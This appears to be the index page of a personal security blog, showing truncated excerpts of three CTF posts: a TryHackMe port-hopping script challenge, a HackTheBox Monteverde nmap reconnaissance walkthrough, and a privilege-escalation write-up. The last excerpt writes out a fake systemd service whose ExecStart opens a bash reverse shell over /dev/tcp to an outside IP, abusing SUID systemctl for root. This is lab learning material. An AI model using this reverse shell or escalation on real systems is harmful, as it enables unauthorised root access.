circusmonkey404's Security Site

I just want to document this so I have it for the future. Here is a python script I wrote to solve this callenge on tryhack.me Here are the requirements You need to write a script that connects to this webserver on the correct port, do an operation on a number and then move onto the next port. Start your original number at 0. The format is:  operation, number, next port. For example the website might display,  add 900 3212  which would be: add 900 and move onto port 3212. Then if it was  minus 212 3499 , you'd minus 212 (from the previous number which was 900) and move onto the next port 3499 Do this until you the page response is STOP (or you hit port 9765). Each port is also only live for 4 seconds. After that it goes to the next port. You might have to wait until port 1337 becomes live again... Go to: http://<machines_ip>:3010 to start... General Approach(it's best to do this using the sockets library in Python): Create a socket in Python using the  sockets  library Co

Hackthebox.eu - Retired - Monteverde Recon As always I start with a simple UP/Down scan on all TCP ports to see what is open   nmap -T4 -p- -oX /root/Desktop/HTB/monteverde/nmapb.xml 10.10.10.172 Then I convert that to HTML xsltproc /root/Desktop/HTB/monteverde/nmapb.xml -o /root/Desktop/HTB/monteverde/nmapb.html That’s a bunch of open ports. Lets run nmap again against these ports with the -A switch to try and finger OS/Service nmap -T4 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49673,49702 -A -oX /root/Desktop/HTB/monteverde/nmaf.xml 10.10.10.172 Then convert that to HTML xsltproc /root/Desktop/HTB/monteverde/nmaf.xml -o /root/Desktop/HTB/monteverde/nmapf.html    *****fixed my little typo here in the name of the file Ok It looks like a windows box, and a Domain controller at that. We can see megabank.local for a domain name, we can also see what looks like winRM on 5985 Let’s try to see if we can see anything on smb It’s there and allowed us to connect

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The